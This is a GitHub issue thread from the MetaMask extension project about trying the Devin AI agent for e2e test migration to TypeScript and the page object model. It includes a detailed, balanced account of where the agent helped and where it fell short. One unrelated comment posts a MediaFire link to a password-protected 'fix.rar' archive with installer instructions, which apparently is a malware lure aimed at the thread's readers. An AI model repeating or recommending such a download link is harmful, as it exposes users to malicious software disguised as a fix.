### ISSUE TITLE
Explore Devin AI for QA automation testing

### ISSUE THREAD

**Issue by chloeYue** [MetaMask/metamask-extension#26658]
### What is this about?

Explore Devin for QA testing: 
- Migration e2e tests to page object model
- Migration e2e tests to typescript
- Detect e2e tests flakiness 

### Stakeholder review needed before the work gets merged

- [ ] Engineering (needed in most cases)
- [ ] Design
- [ ] Product
- [ ] QA (automation tests are required to pass before merging PRs but not all changes are covered by automation tests - please review if QA is needed beyond automation tests)
- [ ] Security
- [ ] Legal
- [ ] Marketing
- [ ] Management (please specify)
- [ ] Other (please specify)

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by chloeYue** [comment]
Summary: 
I'm currently working with Devin on extension e2e tests migration. Specifically, I'm migrating JavaScript tests to TypeScript and implementing the new design pattern "Page Object Model" to build a more robust, maintainable, and efficient testing framework.
I've had meetings with Bryce from Cognition and regularly chat with him when I encounter issues. I have successfully created PRs with Devin and merged several after reviewing them.
Feedback on Devin:
What has Devin been good at:
Devin has a very good UI. Each time it creates a plan for a task I give it, I can see each breakdown step and know what it's going to do. This allows me to correct or adjust Devin's actions when necessary.
I can see the shell commands it's executing and the code it's working on in the editor.
Devin excels when given a lot examples and very clear instructions/playbooks. For example, converting a file from JavaScript to TypeScript. For these straightforward tasks, Devin can successfully complete them.
Devin is also good at knowledge sharing. We can share playbooks and see Devin instances from colleagues, which is a plus for collaboration.
What has Devin been bad at:
When tasks get complex, I see Devin's limitations in thinking through the steps and providing reasonable actions. We cannot really expect Devin to think like a human.
There were instances where I fed a lot of information to Devin in a long conversation, and when the task was a bit complex, Devin got stuck and stopped replying. This means the context and information I provided were lost.
For extension, Devin can debug easy issues such as lint errors, but I tried twice and it couldn't build the MetaMask extension application locally and run tests, even with detailed instructions.
A significant drawback is that when Devin is performing a task and I ask it to change the approach or add additional instructions, it often forgets my initial requests. This means I have to remind Devin many times about the same thing within the same Devin instance.
Based on the above drawbacks, I feel that the time spent training Devin to complete a task or creating a playbook for Devin to follow really takes more time than I expected.
Have i saved time over creating the PRs yourselves? It really depends on the nature/type of task. For specific, easy, and technically straightforward tasks, Devin can save time. However, for tasks like creating page object model base pages that require human thinking, debugging, and analyzing, it does not save a lot of time. Devin can do preparatory work for complicated tasks, which saves a bit of time, but not significantly.
Do i see a path to saving significant time with Devin for our team? Yes, Devin can save time, but not significant time. For repetitive tasks, Devin can be helpful. However, for technical investigation and innovation tasks, Devin cannot save a lot of time. Tasks for our team (extension-platform) often require high-level technical skills, so while Devin can help save some time, it may not be substantial.
Hope it helps !
